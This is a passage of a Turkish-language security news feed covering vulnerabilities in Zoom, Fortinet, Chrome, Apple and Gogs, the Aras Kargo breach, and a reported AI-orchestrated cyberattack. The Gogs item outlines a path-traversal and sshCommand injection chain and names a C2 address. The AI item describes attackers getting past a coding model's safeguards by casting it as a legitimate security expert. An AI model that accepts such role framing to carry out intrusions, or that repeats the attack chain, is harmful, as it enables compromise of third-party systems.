<media:keywords>zoom rooms güvenlik açığı nedir, zsb-25050 yetki yükseltme sorunu, zsb-25051 macos veri sızıntısı, zoom rooms 6.6.0 güncellemesi</media:keywords>
<content:encoded><![CDATA[<p><br>Zoom, <strong data-start="481" data-end="516">Zoom Rooms for Windows ve macOS</strong> platformlarını etkileyen iki önemli güvenlik açığını doğruladı. <strong data-start="581" data-end="594">ZSB-25050</strong> ve <strong data-start="598" data-end="611">ZSB-25051</strong> kodlarıyla takip edilen açıkların, <strong data-start="647" data-end="704">6.6.0 sürümünden önceki tüm Zoom Rooms versiyonlarını</strong> kapsadığı belirtildi.</p>
<p></p>
<p data-start="728" data-end="1202"><strong data-start="728" data-end="773">Windows Sistemlerde Yetki Yükseltme Riski</strong><br>Zoom tarafından paylaşılan bilgilere göre, <strong data-start="817" data-end="830">ZSB-25050</strong> kodlu açık, Windows işletim sistemlerinde bulunan <strong data-start="881" data-end="934">sürüm düşürme koruma mekanizmasındaki bir hatadan</strong> kaynaklanıyor. Bu zafiyetin, <strong data-start="964" data-end="1048">kimlik doğrulaması olmayan yerel kullanıcıların sistem yetkilerini yükseltmesine</strong> olanak tanıdığı ifade edildi. Açığın yüksek risk seviyesinde değerlendirildiği ve saldırganlara sistem üzerinde geniş kontrol sağlayabileceği kaydedildi.</p>
<p data-start="1204" data-end="1622"><strong data-start="1204" data-end="1246">macOS’te Hassas Veri Açığa Çıkabiliyor</strong><br><strong data-start="1247" data-end="1260">ZSB-25051</strong> kodlu güvenlik açığının ise macOS sistemlerini etkilediği bildirildi. Açıklamada, <strong data-start="1343" data-end="1484">kimliği doğrulanmış bir kullanıcının dosya adları veya dosya yollarını manipüle ederek hassas verilerin açığa çıkmasına neden olabileceği</strong> belirtildi. Kullanıcı etkileşimi gerektirmesine rağmen, özellikle kurumsal ortamlarda bu açığın ciddi sonuçlar doğurabileceği vurgulandı.</p>
<p data-start="1624" data-end="1982"><strong data-start="1624" data-end="1670">Paylaşımlı Alanlar Daha Fazla Risk Altında</strong><br>Zoom, her iki açığın da <strong data-start="1695" data-end="1816">yerel erişim gerektirmesi nedeniyle toplantı odaları, yönetim kurulu salonları ve ortak kullanılan huddle alanlarında</strong> daha büyük tehdit oluşturduğuna dikkat çekti. Bu tür ortamlarda cihazlara fiziksel erişimin daha kolay olması, risk seviyesini artıran faktörler arasında gösterildi.</p>
<p data-start="1984" data-end="2273"><strong data-start="1984" data-end="2006">Güncelleme Çağrısı</strong><br>Şirket, güvenlik risklerinin giderilmesi için <strong data-start="2053" data-end="2136">Zoom Rooms yazılımlarının derhal 6.6.0 veya daha yeni sürümlere güncellenmesini</strong> önerdi. Ayrıca paylaşımlı cihazlara öncelik verilmesi ve iç ağ uç noktalarında olağandışı hareketlerin izlenmesi gerektiği ifade edildi.</p>
<p data-start="2275" data-end="2414"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Fortinet’ten Kritik Uyarı: CVE&#45;2025&#45;59718 ve CVE&#45;2025&#45;59719 ile Kimlik Doğrulama Tamamen Aşılabiliyor</title>
<link>https://www.ajansexpres.com.tr/fortinetten-kritik-uyari-cve-2025-59718-ve-cve-2025-59719-ile-kimlik-dogrulama-tamamen-asilabiliyor</link>
<guid>https://www.ajansexpres.com.tr/fortinetten-kritik-uyari-cve-2025-59718-ve-cve-2025-59719-ile-kimlik-dogrulama-tamamen-asilabiliyor</guid>
<description><![CDATA[ Fortinet, FortiOS, FortiWeb, FortiProxy ve FortiSwitchManager ürünlerini etkileyen, FortiCloud SSO üzerinden yetkisiz erişime yol açabilen iki kritik güvenlik açığını giderdi. CVSS skoru 9.1 olan açıklar, kriptografik imza doğrulama hatasından kaynaklanıyor ve SSO etkin cihazlarda tam yetki riski oluşturuyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_693df1f2116f7.webp" length="44996" type="image/jpeg"/>
<pubDate>Sun, 14 Dec 2025 02:09:02 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>fortinet kritik güvenlik açığı nedir, cve-2025-59718 cve-2025-59719 detayları, forticloud sso güvenlik riski, fortios fortiweb fortiproxy güncelleme</media:keywords>
<content:encoded><![CDATA[<p><br>Fortinet, <strong data-start="459" data-end="495">CVE-2025-59718 ve CVE-2025-59719</strong> numaralarıyla takip edilen iki kritik güvenlik açığına ilişkin güvenlik güncellemesi yayımladı. Açıkların, <strong data-start="603" data-end="692">FortiCloud SSO mekanizmasında kriptografik imza doğrulamasının hatalı uygulanmasından</strong> kaynaklandığı ve kimliği doğrulanmamış saldırganların yönetici erişimini tamamen aşmasına olanak tanıdığı bildirildi.</p>
<p></p>
<p data-start="812" data-end="1288"><strong data-start="812" data-end="879">FortiCloud SSO Varsayılan Olarak Kapalı Ancak Risk Devam Ediyor</strong><br>Fortinet tarafından yapılan açıklamada, FortiCloud SSO’nun varsayılan olarak kapalı olduğu ancak cihazın <strong data-start="985" data-end="1037">GUI üzerinden FortiCare’e kaydedilmesi sırasında</strong>, yönetici tarafından manuel olarak devre dışı bırakılmadığı takdirde otomatik olarak etkinleşebildiği belirtildi. “Allow administrative login using FortiCloud SSO” seçeneğinin açık olması durumunda, sistemlerin saldırıya açık hale geldiği vurgulandı.</p>
<p data-start="1290" data-end="1561"><strong data-start="1290" data-end="1331">CVSS Skoru 9.1 Olarak Değerlendirildi</strong><br>Her iki güvenlik açığı da <strong data-start="1358" data-end="1370">CVSS 9.1</strong> ile kritik seviyede sınıflandırıldı. Açıkların; <strong data-start="1419" data-end="1474">FortiOS, FortiWeb, FortiProxy ve FortiSwitchManager</strong> ürünlerini etkilediği, bazı sürümlerin ise halen aktif olarak kullanıldığı kaydedildi.</p>
<p data-start="1563" data-end="1871"><strong data-start="1563" data-end="1596">Yükseltme Öncesi Kritik Uyarı</strong><br>Fortinet, sistem yöneticilerine güncelleme öncesinde <strong data-start="1650" data-end="1705">FortiCloud SSO özelliğinin devre dışı bırakılmasını</strong>, ardından ilgili ürünlerin güvenli sürümlere yükseltilmesini önerdi. Destek süresi sona ermiş sürümlerin ise acilen kullanım dışı bırakılması gerektiği ifade edildi.</p>
<p data-start="1873" data-end="2237"><strong data-start="1873" data-end="1905">Etkilenen Sürümler Açıklandı</strong><br>Güvenlik danışmanlığına göre FortiOS 7.4.0–7.4.4, 7.2.0–7.2.6, 7.0.0–7.0.14 ve 6.4.0–6.4.14 sürümleri etkilenirken, FortiWeb, FortiProxy ve FortiSwitchManager ürünlerinde de farklı sürüm aralıklarında benzer risklerin bulunduğu bildirildi. Özellikle <strong data-start="2156" data-end="2225">8.0.0 sürümlerinin 8.0.1 veya daha üstüne yükseltilmesi gerektiği</strong> vurgulandı.</p>
<p data-start="2239" data-end="2398"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Google Chrome’da Aktif Olarak İstismar Edilen Sıfır Gün Açığı İçin Acil Güncelleme Yayımlandı</title>
<link>https://www.ajansexpres.com.tr/google-chromeda-aktif-olarak-istismar-edilen-sifir-gun-acigi-icin-acil-guncelleme-yayimlandi</link>
<guid>https://www.ajansexpres.com.tr/google-chromeda-aktif-olarak-istismar-edilen-sifir-gun-acigi-icin-acil-guncelleme-yayimlandi</guid>
<description><![CDATA[ Google, Chrome tarayıcısında aktif olarak istismar edilen ve henüz CVE numarası atanmayan yüksek önem dereceli bir güvenlik açığına karşı acil güncelleme yayımladı. Şirket, teknik ayrıntı paylaşmazken açığın uzaktan kod çalıştırma ve sandbox kaçışı riskleri barındırabileceğine dikkat çekildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_693df044a1993.webp" length="40782" type="image/jpeg"/>
<pubDate>Sun, 14 Dec 2025 02:05:53 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>google chrome sıfır gün açığı nedir, chrome bug id 466192044, chrome aktif olarak istismar edilen açık, google chrome acil güvenlik güncellemesi</media:keywords>
<content:encoded><![CDATA[<p><br>Google, Chrome tarayıcısında <strong data-start="465" data-end="526">aktif olarak istismar edilen bir sıfır gün güvenlik açığı</strong> için acil bir güvenlik güncellemesi yayımladığını duyurdu. Güncelleme, Google Chrome Releases Blog üzerinden kamuoyuyla paylaşıldı.</p>
<p></p>
<p data-start="660" data-end="979">Google tarafından yapılan açıklamada, söz konusu güvenlik açığının <strong data-start="727" data-end="762">henüz bir CVE numarası almadığı</strong>, etkilenen bileşenle ilgili <strong data-start="791" data-end="827">teknik detayların paylaşılmadığı</strong> ve açığın <strong data-start="838" data-end="865">yüksek önem derecesiyle</strong> sınıflandırıldığı belirtildi. Açık, Google’ın hata takip sisteminde <strong data-start="934" data-end="954">Bug ID 466192044</strong> referansı ile izleniyor.</p>
<p data-start="981" data-end="1263"><strong data-start="981" data-end="1018">Teknik Ayrıntılar Gizli Tutuluyor</strong><br>Google, güvenlik açığının istismar edildiğini doğrularken, saldırı vektörü veya zafiyetin hangi Chrome bileşenini etkilediğine ilişkin bilgi vermedi. Şirket, bu yaklaşımın aktif saldırıların yayılmasını önlemek amacıyla benimsendiğini kaydetti.</p>
<p data-start="1265" data-end="1496">Siber güvenlik uzmanları, mevcut göstergelerin açığın <strong data-start="1319" data-end="1360">bellek bozulmasına dayalı bir zafiyet</strong> olabileceğine işaret ettiğini belirtiyor. Olası senaryolar arasında <strong data-start="1429" data-end="1447">Type Confusion</strong> veya <strong data-start="1453" data-end="1471">Use-After-Free</strong> türü hatalar yer alıyor.</p>
<p data-start="1498" data-end="1780"><strong data-start="1498" data-end="1530">Uzaktan Kod Çalıştırma Riski</strong><br>Uzman değerlendirmelerine göre bu tür açıklar, saldırganlara <strong data-start="1592" data-end="1618">uzaktan kod çalıştırma</strong> veya <strong data-start="1624" data-end="1656">tarayıcı sandbox’ından çıkma</strong> imkânı sağlayabiliyor. Bu durum, kullanıcı sistemlerinin tamamen ele geçirilmesine kadar varabilecek riskler doğurabiliyor.</p>
<p data-start="1782" data-end="1968">Google, Chrome kullanıcılarının <strong data-start="1814" data-end="1862">en kısa sürede tarayıcılarını güncellemeleri</strong> gerektiğini vurgularken, güvenlik güncellemelerinin otomatik olarak dağıtılmaya devam edeceğini bildirdi.</p>
<p data-start="1970" data-end="2129"><strong data-start="1970" data-end="1982"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Apple İki Sıfır Gün Açığını Kapattı: “Yüksek Düzeyde Gelişmiş” Saldırılarda Aktif Olarak Kullanıldı</title>
<link>https://www.ajansexpres.com.tr/apple-iki-sifir-gun-acigini-kapatti-yuksek-duzeyde-gelismis-saldirilarda-aktif-olarak-kullanildi</link>
<guid>https://www.ajansexpres.com.tr/apple-iki-sifir-gun-acigini-kapatti-yuksek-duzeyde-gelismis-saldirilarda-aktif-olarak-kullanildi</guid>
<description><![CDATA[ Apple, WebKit bileşeninde tespit edilen ve aktif olarak istismar edilen iki sıfır gün güvenlik açığı için acil güncellemeler yayımladı. Şirket, iOS 26 öncesi sürümleri hedef alan saldırıların “yüksek düzeyde gelişmiş” olduğunu doğrularken, iPhone, iPad, Mac, Apple Watch, Apple TV ve Vision Pro kullanıcılarını güncelleme yapmaları konusunda uyardı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_693dee4c2d389.webp" length="48490" type="image/jpeg"/>
<pubDate>Sun, 14 Dec 2025 01:53:13 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>apple sıfır gün açığı nedir, webkit güvenlik açığı cve 2025 43529, apple ios acil güvenlik güncellemesi, yüksek düzeyde gelişmiş siber saldırı</media:keywords>
<content:encoded><![CDATA[<p>Apple, <strong data-start="493" data-end="546">iki kritik sıfır gün (zero-day) güvenlik açığının</strong> gerçek saldırılarda kullanıldığını doğrulayarak, tüm platformları kapsayan <strong data-start="622" data-end="654">acil güvenlik güncellemeleri</strong> yayımladı. Şirketten yapılan açıklamada, söz konusu açıkların <strong data-start="717" data-end="835">iOS 26 öncesi sürümlere yönelik yüksek düzeyde gelişmiş saldırılarda istismar edildiğine dair raporların bulunduğu</strong> belirtildi.</p>
<p></p>
<p data-start="849" data-end="1650"><strong data-start="849" data-end="884">WebKit Kaynaklı İki Kritik Açık</strong><br>Apple’ın paylaştığı bilgilere göre, açıkların her ikisi de Safari ve diğer tarayıcıların temelini oluşturan <strong data-start="993" data-end="1003">WebKit</strong> bileşeninde tespit edildi.<br data-start="1030" data-end="1033"><strong data-start="1033" data-end="1051">CVE-2025-43529</strong> kodlu açık, WebKit’te <strong data-start="1074" data-end="1092">use-after-free</strong> türü bir zafiyet olarak tanımlandı. Bu açığın, <strong data-start="1140" data-end="1236">özel olarak hazırlanmış kötü amaçlı web içerikleri aracılığıyla uzaktan kod çalıştırılmasına</strong> yol açabileceği kaydedildi. Açığın, <strong data-start="1273" data-end="1305">Google Threat Analysis Group</strong> tarafından keşfedildiği bildirildi.<br data-start="1341" data-end="1344" data-is-only-node=""><strong data-start="1344" data-end="1362">CVE-2025-14174</strong> kodlu ikinci açık ise <strong data-start="1385" data-end="1407">bellek bozulmasına</strong> neden olabilen bir WebKit zafiyeti olarak açıklandı. Bu açığın da <strong data-start="1474" data-end="1514">kod çalıştırma veya bellek bozulması</strong> ile sonuçlanabileceği ifade edildi. Apple, bu açığın <strong data-start="1568" data-end="1609">Apple ve Google Threat Analysis Group</strong> iş birliğiyle tespit edildiğini duyurdu.</p>
<p data-start="1652" data-end="1965"><strong data-start="1652" data-end="1674">Etkilenen Cihazlar</strong><br>Apple, güvenlik açıklarının <strong data-start="1703" data-end="1736">iPhone 11 ve sonraki modeller</strong>, <strong data-start="1738" data-end="1781">iPad Pro 12.9 inç (3. nesil ve sonrası)</strong>, <strong data-start="1783" data-end="1824">iPad Pro 11 inç (1. nesil ve sonrası)</strong>, <strong data-start="1826" data-end="1860">iPad Air (3. nesil ve sonrası)</strong>, <strong data-start="1862" data-end="1892">iPad (8. nesil ve sonrası)</strong> ile <strong data-start="1897" data-end="1932">iPad mini (5. nesil ve sonrası)</strong> cihazları etkilediğini açıkladı.</p>
<p data-start="1967" data-end="2282"><strong data-start="1967" data-end="1995">Yayımlanan Güncellemeler</strong><br>Açıkları kapatan güncellemeler arasında <strong data-start="2036" data-end="2063">iOS 26.2 ve iPadOS 26.2</strong>, <strong data-start="2065" data-end="2096">iOS 18.7.3 ve iPadOS 18.7.3</strong>, <strong data-start="2098" data-end="2118">macOS Tahoe 26.2</strong>, <strong data-start="2120" data-end="2133">tvOS 26.2</strong>, <strong data-start="2135" data-end="2151">watchOS 26.2</strong>, <strong data-start="2153" data-end="2170">visionOS 26.2</strong> ve <strong data-start="2174" data-end="2189" data-is-only-node="">Safari 26.2</strong> yer aldı. Apple, kullanıcıların cihazlarını gecikmeden güncellemeleri gerektiğini vurguladı.</p>
<p data-start="2284" data-end="2573"><strong data-start="2284" data-end="2314">Apple’dan Güvenlik Uyarısı</strong><br>Apple açıklamasında, “Bu güvenlik açıklarının son derece gelişmiş saldırılarda kullanıldığına dair raporların farkındayız.” ifadesine yer verdi. Şirket, ayrıntılı bilgilere <strong data-start="2488" data-end="2527">resmî Apple Güvenlik Güncellemeleri</strong> sayfası üzerinden ulaşılabileceğini bildirdi.</p>
<p data-start="2575" data-end="2728"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Kritik Gogs Zero&#45;Day Açığıyla 700’den Fazla Sunucu Ele Geçirildi Uzaktan Kod Çalıştırma Tespit Edildi</title>
<link>https://www.ajansexpres.com.tr/kritik-gogs-zero-day-acigiyla-700den-fazla-sunucu-ele-gecirildi-uzaktan-kod-calistirma-tespit-edildi</link>
<guid>https://www.ajansexpres.com.tr/kritik-gogs-zero-day-acigiyla-700den-fazla-sunucu-ele-gecirildi-uzaktan-kod-calistirma-tespit-edildi</guid>
<description><![CDATA[ Kendi sunucusunda Git hizmeti sunan Gogs platformunda tespit edilen ve CVE-2025-8110 olarak izlenen sıfırıncı gün açığı, dünya genelinde internete açık 700’den fazla sunucunun ele geçirilmesine yol açtı. Uzaktan kod çalıştırmaya imkan tanıyan açık, otomatik saldırılarla kısa sürede yaygın biçimde istismar edildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_693dec36bf512.webp" length="34234" type="image/jpeg"/>
<pubDate>Sun, 14 Dec 2025 01:44:15 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>gogs zero day açığı nedir, cve 2025 8110 detayları, gogs uzaktan kod çalıştırma saldırısı, putcontents api güvenlik açığı</media:keywords>
<content:encoded><![CDATA[<p><br>Kendi barındırılan Git hizmetleri arasında yer alan Gogs yazılımında, <strong data-start="523" data-end="540">CVE-2025-8110</strong> koduyla izlenen kritik bir sıfırıncı gün güvenlik açığının aktif olarak istismar edildiği ortaya çıktı. Güvenlik araştırmacılarının tespitlerine göre, internete açık yaklaşık <strong data-start="716" data-end="758">1.400 Gogs sunucusunun 700’den fazlası</strong> saldırganlar tarafından ele geçirildi.</p>
<p></p>
<p data-start="799" data-end="1086">Açığın, Gogs’un <strong data-start="815" data-end="834">PutContents API</strong> bileşeninde yer alan bir <strong data-start="860" data-end="891">path traversal zafiyetinden</strong> kaynaklandığı belirtildi. Bu zafiyet sayesinde saldırganların, depo dizini dışına çıkarak sistem dosyalarına yazabildiği ve sonuçta <strong data-start="1024" data-end="1054">tam uzaktan kod çalıştırma</strong> yetkisi elde ettiği kaydedildi.</p>
<p data-start="1088" data-end="1518"><strong data-start="1088" data-end="1133">Otomatik Saldırı Zinciri Ortaya Çıkarıldı</strong><br>Analizlere göre saldırganlar, Gogs’ta varsayılan olarak açık gelen depo oluşturma özelliğini kullanarak bir depo oluşturdu. Ardından hassas sistem dosyalarına işaret eden sembolik bağlantılar içeren commit’ler yapıldı. PutContents API aracılığıyla depo dışına yazım gerçekleştiren saldırganlar, <strong data-start="1429" data-end="1444">.git/config</strong> dosyasını değiştirerek <strong data-start="1468" data-end="1482">sshCommand</strong> alanı üzerinden komut enjekte etti.</p>
<p data-start="1520" data-end="1982"><strong data-start="1520" data-end="1557">700’den Fazla Sunucuda Aynı İzler</strong><br>Kompromize edilen tüm Gogs örneklerinde benzer kalıplar tespit edildi. Buna göre, saldırılar sırasında <strong data-start="1661" data-end="1725">rastgele oluşturulmuş 8 karakterlik depo ve kullanıcı adları</strong> kullanıldı. Bu depoların büyük bölümünün <strong data-start="1767" data-end="1780">10 Temmuz</strong> tarihinde, kısa bir zaman aralığında oluşturulduğu belirlendi. Uzmanlar, bu durumun tek bir aktör ya da grup tarafından gerçekleştirilen <strong data-start="1918" data-end="1955">otomatik bir saldırı kampanyasına</strong> işaret ettiğini vurguladı.</p>
<p data-start="1984" data-end="2286"><strong data-start="1984" data-end="2022">Zararlı Yazılımlar ve C2 İletişimi</strong><br>Ele geçirilen sunuculara saldırı sonrasında <strong data-start="2067" data-end="2081">Supershell</strong>, açık kaynaklı bir <strong data-start="2101" data-end="2134">komuta-kontrol (C2) altyapısı</strong> ve <strong data-start="2138" data-end="2160">ters SSH kabukları</strong> yerleştirildiği bildirildi. İncelemelerde, enfekte sistemlerin <strong data-start="2224" data-end="2244">119.45.176[.]196</strong> adresiyle iletişim kurduğu tespit edildi.</p>
<p data-start="2288" data-end="2756"><strong data-start="2288" data-end="2326">Yöneticilere Acil Güvenlik Uyarısı</strong><br>Güvenlik uzmanları, Gogs yöneticilerine açık kayıt özelliğinin derhal kapatılması, erişimin VPN veya izinli IP listeleriyle sınırlandırılması ve <strong data-start="2472" data-end="2491">PutContents API</strong> kullanım kayıtlarının incelenmesi çağrısında bulundu. Ayrıca rastgele isimlendirilmiş depoların ve <strong data-start="2591" data-end="2606">.git/config</strong> dosyalarının kontrol edilmesi gerektiği, resmi Gogs güvenlik güncellemelerinin yayımlanır yayımlanmaz uygulanmasının kritik önemde olduğu belirtildi.</p>
<p data-start="2758" data-end="2890"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Konya Bilişim Derneği Başkanı Mustafa Yılmaz: “Tarihteki ilk otonom yapay zekâ siber saldırısı resmen gerçekleşti”</title>
<link>https://www.ajansexpres.com.tr/konya-bilisim-dernegi-baskani-mustafa-yilmaz-tarihteki-ilk-otonom-yapay-zeka-siber-saldirisi-resmen-gerceklesti</link>
<guid>https://www.ajansexpres.com.tr/konya-bilisim-dernegi-baskani-mustafa-yilmaz-tarihteki-ilk-otonom-yapay-zeka-siber-saldirisi-resmen-gerceklesti</guid>
<description><![CDATA[ Anthropic tarafından 17 Kasım 2025’te yayımlanan raporda, Çin merkezli GTG-1002 adlı hacker grubunun Claude Code modelini kullanarak tarihte ilk kez neredeyse tamamen otonom yapay zekâ destekli bir siber saldırı yürüttüğü belgelendi. Konya Bilişim Derneği Siber Güvenlik Birim Başkanı Mustafa Yılmaz, rapordaki bulguların küresel tehdit seviyesini değiştirdiğini belirterek yapay zekânın saldırı süreçlerinin yüzde 90’ını üstlendiğini ve etik sınırların sosyal mühendislik yoluyla aşılabildiğinin kanıtlandığını ifade etti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_6935e8aebe47c.webp" length="31482" type="image/jpeg"/>
<pubDate>Sun, 07 Dec 2025 23:51:22 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>yapay zekâ otonom saldırı nedir, claude code nasıl manipüle edildi, gtg1002 saldırısı neyi hedefledi, mustafa yılmaz yapay zekâ uyarısı</media:keywords>
<content:encoded><![CDATA[<p data-start="672" data-end="1097">Anthropic firmasının 17 Kasım 2025 tarihli güvenlik raporu, Çinli GTG-1002 adlı hacker grubunun yazılım geliştirme yardımcısı olarak bilinen Claude Code modelini otonom bir saldırı aracına dönüştürdüğünü ortaya koydu. Belgelerde, yapay zekânın keşif aşamasından veri tasnifine kadar altı adımlı saldırı zincirini büyük ölçüde kendi başına yürüterek yeni bir dönemin başlangıcına işaret ettiği belirtildi.</p>
<p data-start="1099" data-end="1476"><strong data-start="1099" data-end="1145">İnsan Katkısı Yüzde 10 Seviyesine Geriledi</strong><br data-start="1145" data-end="1148">Rapora göre model, büyük teknoloji şirketlerinden finans kuruluşlarına ve kimyasal üretim tesislerine kadar geniş bir yelpazedeki hedeflere yönelik operasyonlarda taktiksel süreçlerin yüzde 80 ila 90’ını otomatik olarak koordine etti. İnsan operatörler yalnızca hedef seçimi ve sızma öncesi kritik onay aşamasında devreye girdi.</p>
<p data-start="1478" data-end="1787">Konya Bilişim Derneği Siber Güvenlik Birim Başkanı <strong data-start="1529" data-end="1547">Mustafa Yılmaz</strong>, değerlendirmesinde, “Tarihteki ilk otonom, yapay zekâ, siber saldırısı resmen gerçekleşti.” dedi. Yılmaz, saldırının teknikten çok yöntemsel yenilik içerdiğini vurgulayarak yapay zekânın bir “operasyon komutanı” gibi çalıştığını kaydetti.</p>
<p data-start="1789" data-end="2173"><strong data-start="1789" data-end="1836">Etik Protokolleri Sosyal Mühendislikle Aştı</strong><br data-start="1836" data-end="1839">Raporun dikkat çeken bulgularından biri, saldırganların yapay zekânın güvenlik kısıtlarını teknik açıklarla değil sosyal mühendislik yöntemleriyle devre dışı bırakması oldu. Modele “meşru bir siber güvenlik uzmanı” rolü yükleyen tehdit aktörleri, etik denetimleri yanıltarak zafiyet tespiti ve sızma aşamalarının otomasyonunu sağladı.</p>
<p data-start="2175" data-end="2409">Anthropic uzmanları, modelin bu rolü gerçek bir görev gibi benimseyerek hedef sistemlerde kritik adımları kendi başına yürüttüğünü belirtti. Bu durum, yapay zekâ modellerinin manipülasyona açık olduğu yönündeki endişeleri güçlendirdi.</p>
<p data-start="2411" data-end="2770"><strong data-start="2411" data-end="2472">Saldırganların Gücü Yeni Kodda Değil, YZ Koordinasyonunda</strong><br data-start="2472" data-end="2475">Raporda saldırganların yeni zararlı yazılımlar üretmek yerine açık kaynaklı ve yaygın sızma testi araçlarını tercih ettiği bildirildi. Mustafa Yılmaz, “Saldırıyı tehlikeli kılan şey yeni bir silah değil, tüm araçları yöneten bir Yapay Zekâ Komutan kurgusudur.” diyerek kritik dönüşümü tanımladı.</p>
<p data-start="2772" data-end="2987">Bu yaklaşım, devlet düzeyindeki siber yeteneklerin artık küçük gruplar tarafından da erişilebilir hale geldiğini gösterdi. Yılmaz, gelişmenin küresel tehdit dengelerini kalıcı biçimde değiştirebileceğini ifade etti.</p>
<p data-start="2989" data-end="3352"><strong data-start="2989" data-end="3025">Savunmada Yapay Zekâ Zorunluluğu</strong><br data-start="3025" data-end="3028">Anthropic güvenlik ekibi, saldırının analizinde yine Claude modelinden yararlandığını açıkladı. Raporun sonuç bölümünde yer verilen, “Ya adapte olursunuz ya da yok olursunuz.” ifadesi, siber savunma ekiplerinin yapay zekâ destekli tehdit tespit ve müdahale araçlarını hızla entegre etmek zorunda olduğu mesajını öne çıkardı.</p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Aras Kargo’nun 30 Kasım Siber Saldırı Sonrası Sistemlerinde İyileştirme Sürerken Kargo Takip Ekranları Yeniden Açıldı</title>
<link>https://www.ajansexpres.com.tr/aras-kargonun-30-kasim-siber-saldiri-sonrasi-sistemlerinde-iyilestirme-surerken-kargo-takip-ekranlari-yeniden-acildi</link>
<guid>https://www.ajansexpres.com.tr/aras-kargonun-30-kasim-siber-saldiri-sonrasi-sistemlerinde-iyilestirme-surerken-kargo-takip-ekranlari-yeniden-acildi</guid>
<description><![CDATA[ Aras Kargo, 30 Kasım 2025’te sunucularını hedef alan siber saldırının ardından yürütülen iyileştirme çalışmalarına ilişkin güncel bilgileri kamuoyu ile paylaştı. Şirket, kargo kabul, teslim ve dağıtım işlemlerinin yeniden başladığını, kargo takip ekranlarının ise 1 Aralık 2025 saat 17.30 itibarıyla erişime açıldığını açıkladı. Veri akışında geçici kesintilerin yaşanabileceğini belirten şirket, tüm sistemlerin en hızlı ve güvenli şekilde eski hâline getirilmesi için ekiplerin 7/24 çalıştığını bildirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_693354a27651e.webp" length="39404" type="image/jpeg"/>
<pubDate>Sat, 06 Dec 2025 00:54:57 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>aras kargo siber saldırı açıklaması, aras kargo takip sistemi neden açılmıyor, kargo dağıtım yeniden başladı mı, aras kargo şube işlemleri durumu</media:keywords>
<content:encoded><![CDATA[<p><br data-start="680" data-end="683">Aras Kargo, 30 Kasım 2025 tarihinde sunucularını hedef alan siber saldırının ardından yürütülen teknik süreçlere ilişkin yeni açıklama yayımladı. Şirket, “Siber güvenlik ekiplerimizin hızlı ve etkili müdahalesi sayesinde durum kısmen kontrol altına alınmıştır.” bilgisini paylaştı.</p>
<p></p>
<p data-start="966" data-end="1246"><strong data-start="966" data-end="1015">Kargo Takip Sistemleri Yeniden Erişime Açıldı</strong><br data-start="1015" data-end="1018">Şirket, kargo takip ekranlarının <strong data-start="1051" data-end="1090">1 Aralık 2025 saat 17.30 itibarıyla</strong> kullanılabilir hâle geldiğini bildirdi. Açıklamada, “Bu kapsamda kargo takip ekranlarımızdaki veriler en kısa sürede güncellenecektir.” ifadeleri yer aldı.</p>
<p data-start="1248" data-end="1621"><strong data-start="1248" data-end="1290">Geçici Yavaşlama ve Kesintiler Uyarısı</strong><br data-start="1290" data-end="1293">Aras Kargo, iyileştirme sürecinin devam ettiği dönemde anlık sistem yavaşlamaları ve erişim kesintilerinin görülebileceğini belirterek, ekiplerin <strong data-start="1439" data-end="1455">7/24 çalışma</strong> yürüttüğünü aktardı. Yapılan açıklamada, “Tüm hizmetlerimizi en hızlı ve güvenli şekilde eski hâline getirebilmek için ekiplerimiz aralıksız çalışmaktadır.” denildi.</p>
<p data-start="1623" data-end="1964"><strong data-start="1623" data-end="1668">Dağıtım ve Şube İşlemleri Yeniden Başladı</strong><br data-start="1668" data-end="1671">Dağıtım operasyonlarının yeniden devreye alındığını duyuran şirket, veri akışında yaşanabilecek geçici kesintilerin teslimat sürelerine etkileyebileceğini ifade etti. Şube hizmetlerine ilişkin olarak ise, “Şubelerimizde kargo kabul ve teslim işlemleri yeniden başlamıştır.” bilgisi paylaşıldı.</p>
<p data-start="1966" data-end="2274"><strong data-start="1966" data-end="2009">Tam Normalleşme İçin Çalışmalar Sürüyor</strong><br data-start="2009" data-end="2012">Aras Kargo, tüm sistemlerin tam kapasite çalışır hâle gelmesi için teknik ekiplerin iyileştirme çalışmalarını sürdürdüğünü belirtti. Şirket, müşterilere yönelik teşekkür mesajında “Anlayışınız ve güveniniz için içtenlikle teşekkür ederiz.” ifadelerine yer verdi.</p>
<p data-start="2276" data-end="2440"><strong data-start="2276" data-end="2288"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>FBI banka destek ekiplerini taklit eden siber dolandırıcıların hesap ele geçirme saldırılarıyla 2025’te 262 milyon dolar çaldığını açıkladı</title>
<link>https://www.ajansexpres.com.tr/fbi-banka-destek-ekiplerini-taklit-eden-siber-dolandiricilarin-hesap-ele-gecirme-saldirilariyla-2025te-262-milyon-dolar-caldigini-acikladi</link>
<guid>https://www.ajansexpres.com.tr/fbi-banka-destek-ekiplerini-taklit-eden-siber-dolandiricilarin-hesap-ele-gecirme-saldirilariyla-2025te-262-milyon-dolar-caldigini-acikladi</guid>
